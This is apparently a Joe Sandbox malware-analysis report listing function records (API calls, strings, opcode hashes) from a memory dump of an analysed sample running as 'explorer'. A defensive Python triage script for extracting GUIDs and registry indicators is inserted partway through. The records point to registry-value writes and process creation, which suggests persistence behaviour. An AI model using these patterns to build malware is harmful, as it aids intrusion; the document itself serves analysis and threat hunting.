• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: Local$Free$CloseHandle$AllocCreateDirectoryObjectProcessSingleSystemWaitlstrlen
• String ID: h
• API String ID: 1515568942-2439710439
APIs
• LocalAlloc.KERNEL32 ref: 00E138F6
• GetSystemDirectoryW.KERNEL32 ref: 00E13917
• LocalAlloc.KERNEL32 ref: 00E1392F
  • Part of subcall function 00E17DA0: lstrlenW.KERNEL32 ref: 00E17DEC
  • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
  • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
• CreateProcessW.KERNEL32 ref: 00E13A0E
• LocalFree.KERNEL32 ref: 00E13A1E
• LocalFree.KERNEL32 ref: 00E13A29
• LocalFree.KERNEL32 ref: 00E13A3B
• LocalFree.KERNEL32 ref: 00E13A46
Strings
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: Local$Free$Alloc$CreateDirectoryProcessSystem_errno_invalid_parameter_noinfolstrlen
• String ID: h
• API String ID: 1407737935-2439710439
APIs
• GetModuleFileNameW.KERNEL32 ref: 00E0786E
  • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
  • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
• RegOpenKeyW.ADVAPI32 ref: 00E078B3
• lstrlenW.KERNEL32 ref: 00E078C2
• RegSetValueExW.ADVAPI32 ref: 00E078F5
• RegCloseKey.ADVAPI32 ref: 00E07907
• RegCloseKey.ADVAPI32 ref: 00E0791C
Strings
• {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00E0787C
• SOFTWARE\%s, xrefs: 00E07883
• {C3120582-398C-4F3B-A956-7E9F9DB9EF8E}, xrefs: 00E078E6
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: Close$FileModuleNameOpenValue_errno_invalid_parameter_noinfolstrlen
• String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
• API String ID: 3731830441-3858757917
                                                                                                            • Opcode ID: 7bb07a2271345102e521609267ec7056a74e37406b2e27a2aab72c2f972f2200
                                                                                                            • Instruction ID: 7316cb814d3f9c3582848e65b2f7e47eb4ce80c978657bf05b21e6e68041ff0f
                                                                                                            • Opcode Fuzzy Hash: 7bb07a2271345102e521609267ec7056a74e37406b2e27a2aab72c2f972f2200
                                                                                                            • Instruction Fuzzy Hash: C7113361328AC092DB20DB25FD8879A6360FBE47C5F805922DA9E936A8DF7DC645C704
                                                                                                            APIs
                                                                                                            • _getptd.LIBCMT ref: 00E2B88D
                                                                                                              • Part of subcall function 00E2AC68: _amsg_exit.LIBCMT ref: 00E2AC7E
                                                                                                            • _getptd.LIBCMT ref: 00E2B8AB
                                                                                                            • _CallSETranslator.LIBCMT ref: 00E2B8F3
                                                                                                              • Part of subcall function 00E28788: _getptd.LIBCMT ref: 00E287AF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _getptd$CallTranslator_amsg_exit
                                                                                                            • String ID: MOC$RCC
                                                                                                            • API String ID: 1374396951-2084237596
                                                                                                            • Opcode ID: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                                                                                                            • Instruction ID: 7d5252b5a4039430768fefde6d8951124e73e95b2ab365746bf8053f61973621
                                                                                                            • Opcode Fuzzy Hash: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                                                                                                            • Instruction Fuzzy Hash: 6351BE72604AE496CF20DF15F1907ADB3A0FBC1B88F596626EB9E67618DF78C191C700
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProcVersion
                                                                                                            • String ID: NTDLL.DLL$RtlGetVersion
                                                                                                            • API String ID: 2685220120-196638859
                                                                                                            • Opcode ID: 42daa815b2a7eb0b21278584d862c4cfba6597e56c53cd9aa9c348133628d252
                                                                                                            • Instruction ID: 7d97ce7ac3e408962118177389f58902f5878336114585413b63af04b380c487
                                                                                                            • Opcode Fuzzy Hash: 42daa815b2a7eb0b21278584d862c4cfba6597e56c53cd9aa9c348133628d252
                                                                                                            • Instruction Fuzzy Hash: F2114C36228B94C2E764DF10F94839AB7B0F3C8794F401925AA8E57768DF3CC688CB00
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$CloseEventHandle$Thread
                                                                                                            • String ID:
                                                                                                            • API String ID: 3315681087-0
                                                                                                            • Opcode ID: 75d140b14a8b61b3ac78a521865084d2b42c1e628267827f94a05f541de129ef
                                                                                                            • Instruction ID: 8791bd27ff6c703c250612993d09f055e5def297e2acd588637a17f1d1f70607
                                                                                                            • Opcode Fuzzy Hash: 75d140b14a8b61b3ac78a521865084d2b42c1e628267827f94a05f541de129ef
                                                                                                            • Instruction Fuzzy Hash: 6F21F1B4611B80C2F7649B20FA6975637A0F374389F106925C945B26E4CF7E84D4C741
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _errno_fltout2_invalid_parameter_noinfo
                                                                                                            • String ID: -
                                                                                                            • API String ID: 485257318-2547889144
                                                                                                            • Opcode ID: f71b6384175b464f91dd1cf97e559d4d32636d652ffd11b7722b2513aca7f18f
                                                                                                            • Instruction ID: 210e526c68fabb7d163abac5295d9865ed3582a81281015de1b3923236e2bb96
                                                                                                            • Opcode Fuzzy Hash: f71b6384175b464f91dd1cf97e559d4d32636d652ffd11b7722b2513aca7f18f
                                                                                                            • Instruction Fuzzy Hash: BF315C62305B8486DB219F25F80875ABBA0E795BD8F146222EF9817BD9DF3DD485CB00
                                                                                                            APIs
                                                                                                            • _lock.LIBCMT ref: 00E328C8
                                                                                                              • Part of subcall function 00E30B64: _amsg_exit.LIBCMT ref: 00E30B8E
                                                                                                            • fclose.LIBCMT ref: 00E328F8
                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,00E30227), ref: 00E3291C
                                                                                                            • free.LIBCMT ref: 00E3292D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalDeleteSection_amsg_exit_lockfclosefree
                                                                                                            • String ID:
                                                                                                            • API String ID: 594724896-0
                                                                                                            • Opcode ID: 78b2622f5411a723218518f8bc3c4c94124d5cfbb3948ed22ac017eabad8ec1a
                                                                                                            • Instruction ID: 23f21a677d508cbec70eddd1103575cdeae1f084aba44be5e71237a85ed5f1ac
                                                                                                            • Opcode Fuzzy Hash: 78b2622f5411a723218518f8bc3c4c94124d5cfbb3948ed22ac017eabad8ec1a
                                                                                                            • Instruction Fuzzy Hash: FB117036610B8482D710DB19F89832DBBA0F7D4B98F259619DBDA67774CF35C852CB04
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2857295742-0
                                                                                                            • Opcode ID: 777dbf8fc3632375601c26065b3abb19c333506527608912849f89bd8911c77b
                                                                                                            • Instruction ID: 50b0b0d47c1c98064202f0bb82ecd2ca5f304b361b62ed0137582e7ae3147d9c
                                                                                                            • Opcode Fuzzy Hash: 777dbf8fc3632375601c26065b3abb19c333506527608912849f89bd8911c77b
                                                                                                            • Instruction Fuzzy Hash: 3FF09230920A9091F7149F95FC9831433A1F7A47D9F64AA16C41AB6AF0CF7F88C9C350
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$FreeLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2513001865-0
                                                                                                            • Opcode ID: 82d95b7103033d902948a90c9e8e53d16c8e26a2043a74430fc3d0cce4b7eb71
                                                                                                            • Instruction ID: 77cbe27263bc5620cbc9df69a1a31fca782edaa63620c226e553d4c48f11c9ca
                                                                                                            • Opcode Fuzzy Hash: 82d95b7103033d902948a90c9e8e53d16c8e26a2043a74430fc3d0cce4b7eb71
                                                                                                            • Instruction Fuzzy Hash: 8901BD34158BC091F7119B24FD583E833A4F3A4BD5F542A26C55AB22B2CF7E88CAC301
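The function records above are terse, so a triage helper for them follows. This is an added example and is not part of the Joe Sandbox report or of any Joe Sandbox tooling. It assumes the record layout shown on this page: bullet-prefixed "Field: value" lines, "API ID" as the first Similarity field of each record, and "$" as the separator inside the API and string lists. The sample input is copied from four of the records on this page (the memory-dump and snapshot lines are left out because the parser ignores them); the rule that treats "GetProcAddress"-style API tokens plus a DLL name and a bare export name as a runtime-resolved export is a heuristic of this example, not something the report states.

```python
"""Triage helper for the Joe Sandbox IDA-plugin function records shown in this report.

Added example, not part of the report or of any Joe Sandbox tooling.  It parses
the bullet-prefixed "Field: value" lines of each function record, splits the
'$'-separated API and string lists, and pulls out the parts an analyst would
hunt on (GUIDs, registry paths, dynamically resolved exports).
"""
import re
from collections import defaultdict

# Constructed sample input: field lines copied from four of the records above
# (the memory-dump and snapshot lines are omitted since the parser ignores them).
SAMPLE = r"""
• API ID: Close$FileModuleNameOpenValue_errno_invalid_parameter_noinfolstrlen
• String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
• API String ID: 3731830441-3858757917
• Opcode ID: 7bb07a2271345102e521609267ec7056a74e37406b2e27a2aab72c2f972f2200
• Instruction Fuzzy Hash: C7113361328AC092DB20DB25FD8879A6360FBE47C5F805922DA9E936A8DF7DC645C704
• API ID: AddressLibraryLoadProcVersion
• String ID: NTDLL.DLL$RtlGetVersion
• API String ID: 2685220120-196638859
• Opcode ID: 42daa815b2a7eb0b21278584d862c4cfba6597e56c53cd9aa9c348133628d252
• Instruction Fuzzy Hash: F2114C36228B94C2E764DF10F94839AB7B0F3C8794F401925AA8E57768DF3CC688CB00
• API ID: CloseHandle$FreeLocal
• String ID:
• API String ID: 2513001865-0
• Opcode ID: 82d95b7103033d902948a90c9e8e53d16c8e26a2043a74430fc3d0cce4b7eb71
• Instruction Fuzzy Hash: 8901BD34158BC091F7119B24FD583E833A4F3A4BD5F542A26C55AB22B2CF7E88CAC301
• API ID: CloseHandle$FreeLocal
• String ID:
• API String ID: 2513001865-0
• Opcode ID: 22895e9f0ad57eb89ae3befc25affe5af3445f895d3ec8ceecc31fa57cfc47ed
"""

FIELDS = ("API ID", "String ID", "API String ID", "Opcode ID",
          "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")
FIELD_RE = re.compile(r"^\s*•\s*(%s):\s*(.*?)\s*$" % "|".join(re.escape(f) for f in FIELDS))
GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")


def parse_records(text):
    """Split the report text into one dict per function.  "API ID" opens a record
    (assumption: it is the first Similarity field of every record, as on this page)."""
    records, cur = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue                      # dump paths, headers, Yara lines: ignored
        field, value = m.groups()
        if field == "API ID":
            cur = {}
            records.append(cur)
        if cur is not None:
            cur[field] = value
    return records


def strings_of(rec):
    """The '$'-separated string list of a record, empty entries dropped."""
    return [s for s in rec.get("String ID", "").split("$") if s]


def extract_indicators(records):
    """Pull out what is worth hunting on: GUIDs, registry paths, and DLL exports
    that the code resolves at runtime instead of importing."""
    ind = {"guids": set(), "registry_paths": set(), "resolved_exports": set()}
    for rec in records:
        strs = strings_of(rec)
        for s in strs:
            ind["guids"].update(GUID_RE.findall(s))
            if s.upper().startswith(("SOFTWARE\\", "SYSTEM\\", "HKEY_")):
                ind["registry_paths"].add(s)
        api = rec.get("API ID", "")
        # Heuristic (assumption, not something the report states): an API set with
        # GetProcAddress-style tokens plus a DLL name and a bare export name means
        # the export is looked up dynamically, as with NTDLL.DLL / RtlGetVersion.
        if "Proc" in api and "Address" in api:
            dlls = [s for s in strs if s.upper().endswith(".DLL")]
            exports = [s for s in strs if not s.upper().endswith(".DLL")]
            ind["resolved_exports"].update((d, e) for d in dlls for e in exports)
    return ind


def profile_groups(records):
    """Group distinct functions (Opcode ID) by API String ID, i.e. by their
    API-set/string-set profile.  A group larger than one means several different
    functions share exactly the same profile (as the two CloseHandle$FreeLocal
    records above do)."""
    groups = defaultdict(set)
    for rec in records:
        if "API String ID" in rec and "Opcode ID" in rec:
            groups[rec["API String ID"]].add(rec["Opcode ID"])
    return dict(groups)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(f"{len(recs)} function records")
    for name, values in extract_indicators(recs).items():
        print(name, sorted(values))
    for api_string_id, opcodes in profile_groups(recs).items():
        if len(opcodes) > 1:
            print(f"profile {api_string_id} shared by {len(opcodes)} functions")
```

Run it against a saved copy of the report text instead of SAMPLE to get the full GUID and registry-string list for a hunt; the "SOFTWARE\%s" path keeps its format specifier because the report does not show what the code substitutes for it.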
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle$FreeLocal
• String ID:
• API String ID: 2513001865-0
• Opcode ID: 22895e9f0ad57eb89ae3befc25affe5af3445f895d3ec8ceecc31fa57cfc47ed
• Instruction ID: 77cbe27263bc5620cbc9df69a1a31fca782edaa63620c226e553d4c48f11c9ca
• Opcode Fuzzy Hash: 22895e9f0ad57eb89ae3befc25affe5af3445f895d3ec8ceecc31fa57cfc47ed
• Instruction Fuzzy Hash: 8901BD34158BC091F7119B24FD583E833A4F3A4BD5F542A26C55AB22B2CF7E88CAC301
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 407ad451bf2e2bf966aa73b9f4abba4dafead0985304cf0f56f4df019bbe3795
• Instruction ID: 2d8c66900049bc66415e0a0b356a90e574ac3a199f40be49ec0785ab11ead19f
• Opcode Fuzzy Hash: 407ad451bf2e2bf966aa73b9f4abba4dafead0985304cf0f56f4df019bbe3795
• Instruction Fuzzy Hash: 38F01522200CC081E7108B50FA8836A63B1F3A0799F503B22D05AA64F0CFBEC8CACB01
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 7a11eaf5b6decfaec6b1ebbcad1cf123de54f51fc7bafbc7f171939df23a1507
• Instruction ID: 2d8c66900049bc66415e0a0b356a90e574ac3a199f40be49ec0785ab11ead19f
• Opcode Fuzzy Hash: 7a11eaf5b6decfaec6b1ebbcad1cf123de54f51fc7bafbc7f171939df23a1507
• Instruction Fuzzy Hash: 38F01522200CC081E7108B50FA8836A63B1F3A0799F503B22D05AA64F0CFBEC8CACB01